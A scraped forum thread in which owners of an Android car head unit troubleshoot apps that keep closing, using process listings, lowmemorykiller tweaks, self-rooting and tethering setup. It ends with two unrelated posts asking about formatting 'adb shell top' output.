u0_a10 1708 209 825364 50108 SyS_epoll_ f772eb80 S com.google.android.gms.unstable
bluetooth 1752 209 719936 30080 SyS_epoll_ f772eb80 S com.android.bluetooth
root 1777 2 0 0 irq_thread 00000000 S irq/286-btif_mu
root 1778 2 0 0 irq_thread 00000000 S irq/288-btip_wa
root 1846 247 6196 416 __skb_recv f76dab80 S daemonsu:10087
u0_a60 2067 209 671340 30384 SyS_epoll_ f772eb80 S com.microntek.radio
system 2120 209 668872 29716 SyS_epoll_ f772eb80 S com.intel.soundprofile
u0_a39 2171 209 674544 31632 SyS_epoll_ f772eb80 S com.hct.screenbutton
u0_a40 2188 209 670856 27088 SyS_epoll_ f772eb80 S android.rockchip.update.service
u0_a37 2393 209 668748 25720 SyS_epoll_ f772eb80 S com.microntek.bluetooth
root 2893 247 7228 388 __skb_recv f76dab80 S daemonsu:10086
root 3090 1 649972 19408 futex_wait f76ceb80 S app_process
shell 3349 263 4328 1348 sigsuspend f7736b80 S /system/bin/sh
shell 3437 3349 3876 1164 poll_sched f778eb80 R su
root 3441 247 9292 484 __skb_recv f76dab80 S daemonsu:0
root 3443 3441 9548 944 poll_sched f76dab80 S daemonsu:0:3437
root 3549 3443 4328 1576 sigsuspend f7653b80 S tmp-mksh
root 3772 2 0 0 worker_thr 00000000 S kworker/1:0
root 3776 2 0 0 worker_thr 00000000 S kworker/0:0
u0_a85 3782 209 835136 72712 SyS_epoll_ f772eb80 S info.kfsoft.android.MemoryIndicator
shell 3913 263 4148 1364 __skb_recv f76e6b80 S logcat
root 3933 2 0 0 worker_thr 00000000 S kworker/u8:1
system 3972 209 726988 64328 SyS_epoll_ f772eb80 S com.android.settings
root 4013 2 0 0 worker_thr 00000000 S kworker/1:2
root 4014 2 0 0 worker_thr 00000000 S kworker/0:2
u0_a7 4019 209 669884 27748 SyS_epoll_ f772eb80 S com.android.defcontainer
root 4065 2 0 0 worker_thr 00000000 S kworker/u9:1
u0_a17 4069 209 934572 110068 SyS_epoll_ f772eb80 S com.android.vending
root 4115 2 0 0 worker_thr 00000000 S kworker/2:0
root 4136 2 0 0 worker_thr 00000000 S kworker/3:1
root 4180 3549 4224 1140 0 f776cb80 R ps
Click to expand...
Click to collapse
That's way over my head!
V5.11 is much better, but it wont play music, or nav sounds randomly, but the radio sounds always work?
I've put it back on V6.0.1 to get the music back, but nav randomly shuts down again.
I'm back to square one.
The seller has agreed to shipping back to Germany for full refund though.
It might be a good option!
OK, next steps now I've not identified a specific task killer is looking into Dalvik cache and VM settings, as perhaps these are too lean and causing the apps to run out and die like that (Still no message seeming to indicate this though).
Anyone any thoughts on tweaking these settings on a head unit? I'll grab my current values and my suggested ones for reference shortly.
--EDIT--
Ah, Dalvik was pre-4.0 and these are 6.0 Marshmallow so do the dalvik cache tweaks still do anything or do I need to look for ART tweaks instead?
still on 5.11 here, looks like disabling 'media audio' under bluetooth settings on my phone allows the head unit to route the music player to the speakers again, not sure why it was letting the radio audio through and not the music audio?
Am trying to get the Marshmallow release working so unfortunately not wanting to revert back to 5 or earlier.
However I'm making progress on 6.x
I believe it's the lowmemorykiller/ART that's getting in the way here, perhaps being set to be too aggressive at larger memory sizes.
I've installed a minfree memory kernel lowmemorykiller (it's easier than tweaking the params from adb shell) - App is "AutoKiller Memory Optimizer". I've not used any of it's other functions as this was the main one I wanted.
So after tweaks I'm running with:
Code:
cat /sys/module/lowmemorykiller/parameters/minfree
2754,5508,7344,13770,16065,18360
So far, running navigation (Google Maps) and then swapping back and forward to music and back, maps didn't close itself at all.
For some reason, music was stopping when switching to maps but I think that's more of an audio routing issue to look into, but so far it doesn't appear to be aggressively killing applications that have focus.
Some more logs that are interesting:
Code:
11-27 18:52:28.530 598 611 I art : Background partial concurrent mark sweep GC freed 21273(1447KB) AllocSpace objects, 3(60KB) LOS objects, 26% free, 11MB/15MB, paused 5.265ms total 141.023ms
11-27 18:52:31.112 6084 6095 I art : Background sticky concurrent mark sweep GC freed 2542(492KB) AllocSpace objects, 0(0B) LOS objects, 0% free, 11MB/11MB, paused 25.845ms total 89.939ms
11-27 18:52:31.185 6084 6095 I art : Background partial concurrent mark sweep GC freed 2011(210KB) AllocSpace objects, 0(0B) LOS objects, 24% free, 12MB/16MB, paused 11.725ms total 71.330ms
-- then after also launching music --
11-27 18:57:16.780 6235 6246 I art : Background sticky concurrent mark sweep GC freed 24160(1164KB) AllocSpace objects, 9(1440KB) LOS objects, 18% free, 12MB/15MB, paused 1.401ms total 112.708ms
11-27 18:57:16.833 6084 6095 I art : Background partial concurrent mark sweep GC freed 27088(1805KB) AllocSpace objects, 30(1196KB) LOS objects, 7% free, 49MB/53MB, paused 3.415ms total 310.197ms
I've also discovered some additional items when debugging, relating to standby, memory and the microntek applications but I'll post to a separate thread as will try and keep this thread on-track.
I'll report back after more extensive testing.
FIX/SOLVED
OK, after 30 minute drive this morning, I've had no app crashes or exits at all, ran maps with navigation and had FM radio on all the way, switched between apps using hard and soft back/keys, no problems, so I'm going to call this one the fix!
So the steps:
Root it
Install "AutoKiller Memory Optimizer" by MobiWIA Kft.
In AutoKiller switch everything OFF but then use the CHANGE button on main screen, set it to MODERATE (Or experiment with different ones)
Remember that needs set after full reboot (standby is fine) unless you add it to autostart at boot.
@Qwertyco I'd go back up to 6 and try the above, might solve the issues for you!
Cheers Andy.
After playing with 5.11 for a few days, it's become apparent that It has sound routing problems whenever
there's a Bluetooth connection to my phone. (Moto G5 on Android 7). The only way I can get music or nav
sound (radio is always Ok!) is to have the connection as 'Internet sharing only', no phone or contacts or A2DP.
It also needs regular rebooting to achieve this, as returning from sleep sometimes messes with the sound routing as well.
I'm going to try going back to 6.0.1, and try the new HIZPO 2017.09.15 update file first before I try your fix.
I updated back to 6.0.1, and tried the HIZPO 2017.09.15 update file, and it just aborted the update after 5 seconds.
I'll have a look at it and try again another time.
I'm back, not used the car for a while, so not had a chance to play.
Andy, what's the rooting procedure, if you don't mind?
Hi, no problem same here as the car has been dead for a while here unfortunately!
I've written a lot of the info up at my blog http://www.thebmwz3.co.uk/2017/11/hizpo-android-car-head-unit-mtcdxrc.html
But rooting is:
* Go into factory settings in Settings menu
* type adbon into the password box and click OK
Try at that point, you should be able to get adb working over wifi. If not, install a terminal app to the head unit and then type "setprop persist.adb.tcp.port 5555" and then reboot the unit. You should then be able to adb over wifi.
Then you can root it using the root procedure at https://hvdwolf.github.io/Joying-RootAssistant/rooting.html and I used the file SuperSU-Joying-Intel-v2.82SR1-patch2.zip which worked first time.
Thanks to Andy and others, I've gone back to Android 6.01 and rooted the thing, followed Andy's tips and it seems to be running fairly smoothly for the first time ever.
I've done all this with the unit on the workbench (coffee table) as it's cold outside!
I can't test the sat nav indoors, but it seems to start up and keep running now.
My mission is to get it to do everything I want it to do before it goes back in the car.
Currently struggling with getting it to auto-tether to my phone Bluetooth, and getting apps to autostart at boot.
I can't seem to find any mention of autorun in the software, and the many autorun apps I've tried don't autorun at boot!
Hey m8, glad you're getting there. It's been in my car for quite a few months now, running smoothly!
So, for the auto-tethering bluetooth I've done this:
Get BluetoothTethering.apk from 'doitright' at https://forum.xda-developers.com/an...elopment/bluetooth-settings-launcher-t3504526 (Don't get blueballs, we don't need it) and follow the instructions to install it onto our headunits (i.e. the bit in the terminal/code block where you write it to /system/priv-app/). I've followed those instructions and my phone (HTC One M8) and car bring their bluetooth up and tether perfectly each time now.
Autorun at boot/wake-up is still a little challenging, however the trick is the one that BluetoothTethering.apk uses above, installing the app into priv-app lets it keep running in the background/at wakeup so the key is there, I've just never bothered to really go further into it.
To do the low-mem-killer settings, since our units don't reboot often I just do that manually, as there isn't an rc.local or bootup script that I've located that I can chain those commands into, but then again I've not tried very hard as it's working for me now!
I use Waze, Google Maps, Music, Radio all swapping between them without crashes. Sure it's not the fastest thing in the world but it works
Thanks Andy, I'll have a go at the tethering app.
The two apps I want to autostart are a night screen dimmer and a speed sensitive volume controller. The priv-app location may well solve that.!
I'll report back.....
Those sound interesting apps, which ones are you using as I'm always on the lookout for decent addons!
Also just be careful having more and more apps running in the background, we've not got a huge amount of RAM/Processor to play with!
well the Bluetooth is now auto connecting, many thanks again to Andy.
After an abortive attempt on my windows 10 laptop, I finally got the ADB to work from my old windows 7 PC over WiFi.
Playing about with these two at the moment:
This:
https://play.google.com/store/apps/details?id=net.codechunk.speedofsound&hl=en
and this:
https://play.google.com/store/apps/details?id=com.urbandroid.lux&hl=en
I just realised I seem to be working without using the "AutoKiller Memory Optimizer", as if it doesn't autostart on boot, I've not been manually starting it?
Thanks @Qwertyco I'll take a look at those two apps.
The autokiller optimizer, once it's ran once, those settings will stick until a full hard reboot/power disconnect not just standby when you turn ignition off, so chances are that's why it's kept working for you so far.
Update:
After doing all the stuff Andy sugested, it's running much better now, and rarely does anything random or unexpected anymore.
I's still anoying me in various ways though, the main thing being that everytime it starts up the music palyer plays the first track of the first album EVERYTIME! This happens to be AC/DC - Hells Bells, which is wearing a bit thin now. It rarely does an 'quick resume' and almost always takes a full boot time to start playing music.
Any Ideas out there?
Hello, I decided that I will analyse running processes and figure out why is my battery not lasting more then half a day usually. For that I figured maybe running
adb shell top
will work. I could send this to a file and later make some analysis of the results. The problem is that it looks like this
Code:
800%cpu 10%user 0%nice 17%sys 772%idle 1%iow 0%irq 0%sirq 0%host
←[7m PID USER PR NI VIRT RES SHR S[%CPU] %MEM TIME+ ARGS ←[0m
28364 system 20 0 2.2G 83M 61M S 15.3 2.4 1:08.09 com.samsung.and+
31155 u0_a193 20 0 2.1G 69M 40M S 4.6 2.0 6:00.62 com.facebook.or+
30834 shell 20 0 11M 4.3M 3.3M R 2.3 0.1 0:00.85 top
3246 system 12 -8 1.6G 14M 11M S 2.3 0.4 249:18.01 surfaceflinger
26367 system 10 -10 2.7G 106M 89M S 1.3 3.0 1:14.78 com.samsung.and+
22515 root 20 0 0 0 0 S 1.3 0.0 0:03.16 [kworker/u16:4]
3825 system 10 -10 3.4G 182M 81M S 1.0 5.2 572:07.02 system_server
971 root 20 0 0 0 0 S 1.0 0.0 151:39.30 [kswapd0]
29785 u0_a209 20 0 1.7G 67M 52M S 0.3 1.9 0:03.20 com.microsoft.o+
21383 root 0 -20 0 0 0 S 0.3 0.0 0:00.84 [kworker/1:0H]
20039 u0_a213 20 0 2.9G 56M 47M S 0.3 1.6 9:15.59 com.digibites.a+
3132 logd 30 10 31M 13M 836K S 0.3 0.3 25:29.47 logd
679 root 20 0 0 0 0 S 0.3 0.0 5:34.54 [kcompactd0]
13 root RT 0 0 0 0 S 0.3 0.0 2:00.01 [migration/1]
30749 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kworker/u17:2]
30699 u0_a379 20 0 2.2G 98M 82M S 0.0 2.8 0:00.95 org.androworks.+
30670 advmodem 20 0 2.2G 74M 65M S 0.0 2.1 0:00.33 com.samsung.and+
30661 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kworker/0:0H]
30652 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kworker/7:2H]
30651 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kworker/5:0H]
the process names are cut. Is there a way to make top command write wider columns? Linux top knows -w but adb top does not.
Seems like running -b makes it wide enough but it shows all processes and not just the top few which would be enough.
I can see that it's also formatted wrong and the column headers don't match the values below. Jeez...
Hello
I need to get the cpu usage from my device (Lenovo Tab M8, Android os) and send it via http-request to my server.
I test it with my smartphone.
I found the app macrodroid, which can automatically send data via http-reuest. So the first step is done.
After a long searching i found the "adb shell" app. So i can test my shell command. So the second step is done
I want to use the command "top -n 1" because my devices are not rooted and i got alway "permission denied" with other commands.
The top command show a output.
THERE IS THE PROBLEM:
if i use the top command on my smarthpohne, i don't got a correct output. The %idle is always same like %cpu
if i connect my phone to my pc and run it in the windows command, it shows the correct data.
for example:
the output on the phone:
Code:
[s[999C[999B[6n[u[H[J[?25l[H[J[s[999C[999B[6n[uTasks: 2 total, 1 running, 1 sleeping, 0 stopped, 0 zombie Mem: 3.5G total, 3.4G used, 129M free, 39M buffers Swap: 2.0G total, 1.6G used, 396M free, 1.1G cached800%cpu 0%user 0%nice 0%sys 800%idle 0%iow 0%irq 0%sirq 0%host[7m PID USER PR NI VIRT RES SHR S[%CPU] %MEM TIME+ ARGS [0m[1m 7831 u0_a357 10 -10 36M 3.7M 3.0M R 4.0 0.1 0:00.00 top -n 1[m 7717 u0_a357 10 -10 33M 2.9M 2.4M S 0.0 0.0 0:00.01 sh[?25h[0m[1000;1H[K[?25h[?25h[0m[1000;1H[K
output on the pc:
Code:
Mem: 3.5G total, 3.4G used, 93M free, 40M buffers
Swap: 2.0G total, 1.6G used, 380M free, 1.0G cached
800%cpu 82%user 0%nice 124%sys 594%idle 0%iow 0%irq 0%sirq 0%host
←[7m PID USER PR NI VIRT RES SHR S[%CPU] %MEM TIME+ ARGS ←[0m
2305 u0_a357 10 -10 25G 258M 164M S 64.7 7.1 23:29.96 com.arlosoft.ma+
517 system 5 -15 1.7G 20M 14M S 44.1 0.5 207:08.58 surfaceflinger
←[mm 7844 shell 20 0 36M 4.3M 3.3M R 23.5 0.1 0:00.10 top -n 1
983 system 18 -2 12G 273M 130M S 17.6 7.5 595:30.94 system_server
←[mm 276 root RT 0 0 0 0 R 17.6 0.0 53:19.28 [decon0]
7843 root 20 0 0 0 0 S 11.7 0.0 0:00.20 [kworker/0:1]
488 system -3 -15 506M 4.3M 3.6M S 11.7 0.1 45:01.04 android.hardwar+
7385 root 0 -20 0 0 0 S 8.8 0.0 0:02.53 [kworker/u17:3]
7807 root 20 0 0 0 0 S 2.9 0.0 0:00.90 [kworker/3:2]
7542 root 20 0 0 0 0 S 2.9 0.0 0:00.00 [kworker/4:0]
2291 root 20 0 0 0 0 S 2.9 0.0 0:02.05 [kworker/u16:2]
2188 root 20 0 0 0 0 S 2.9 0.0 0:02.93 [kworker/u16:0]
7088 u0_a237 10 -10 7.4G 159M 75M S 2.9 4.3 95:05.07 com.samsung.and+
1365 radio 20 0 5.7G 43M 30M S 2.9 1.2 40:36.23 com.android.pho+
496 wifi 20 0 63M 2.8M 2.6M S 2.9 0.0 6:31.76 android.hardwar+
7757 u0_a239 20 0 4.9G 93M 79M S 0.0 2.5 0:00.32 com.samsung.and+
7745 u0_a62 20 0 4.9G 88M 74M S 0.0 2.4 0:00.17 com.sec.android+
7717 u0_a357 10 -10 33M 2.9M 2.4M S 0.0 0.0 0:00.01 sh
7628 root 0 -20 0 0 0 S 0.0 0.0 0:00.00 [kbase_event]
←[?25h←[0m←[1000;1H←[K←[?25h←[?25h←[0m←[1000;1H←[Kstarlte:/ $ 0
how can i get this output on my device???
is it so difficult or is my question not good?
:-( i think there is no solution....